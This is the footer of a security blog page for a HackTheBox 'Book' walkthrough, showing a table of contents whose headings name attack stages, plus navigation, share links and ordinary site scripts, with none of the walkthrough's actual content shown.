<p><a href="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" target="_blank" rel="noopener">Local File Read via XSS</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Summary"><span class="toc-number">1.</span> <span class="toc-text">Quick Summary</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Penetration-Testing-Methodologies"><span class="toc-number">2.</span> <span class="toc-text">Penetration Testing Methodologies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Network-Scanning"><span class="toc-number">3.</span> <span class="toc-text">Network Scanning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Walkthrough"><span class="toc-number">3.1.</span> <span class="toc-text">Walkthrough</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-results"><span class="toc-number">3.2.</span> <span class="toc-text">Nmap results</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">4.</span> <span class="toc-text">Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#The-Book-Website"><span class="toc-number">4.1.</span> <span class="toc-text">The Book Website</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation"><span class="toc-number">5.</span> <span class="toc-text">Post - Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Abusing-SQL-Truncate"><span class="toc-number">5.1.</span> <span class="toc-text">Abusing SQL Truncate</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">6.</span> <span class="toc-text">Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Local-File-Read-via-PDF"><span class="toc-number">6.1.</span> <span class="toc-text">Local File Read via PDF</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Creating-javascript-payloads"><span class="toc-number">6.2.</span> <span class="toc-text">Creating javascript payloads</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Grab-the-user-flag"><span class="toc-number">6.3.</span> <span class="toc-text">Grab the user flag</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">7.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Getting-Root-Access"><span class="toc-number">7.1.</span> <span class="toc-text">Getting Root Access</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Logrotten"><span class="toc-number">7.2.</span> <span class="toc-text">Logrotten</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Compile-logrotten"><span class="toc-number">7.3.</span> <span class="toc-text">Compile logrotten</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Payload-for-Reverse-Shell"><span class="toc-number">7.4.</span> <span class="toc-text">Payload for Reverse Shell</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&text=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&title=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&is_video=false&description=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Book 📚 📖&body=Check out this article: https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&title=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&title=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&title=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&title=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&name=HackTheBox - Book 📚 📖&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://ph-payas0.github.io/2020-07-08/HackTheBox-Book/&t=HackTheBox - Book 📚 📖" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    InfoSec &#64; medz
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
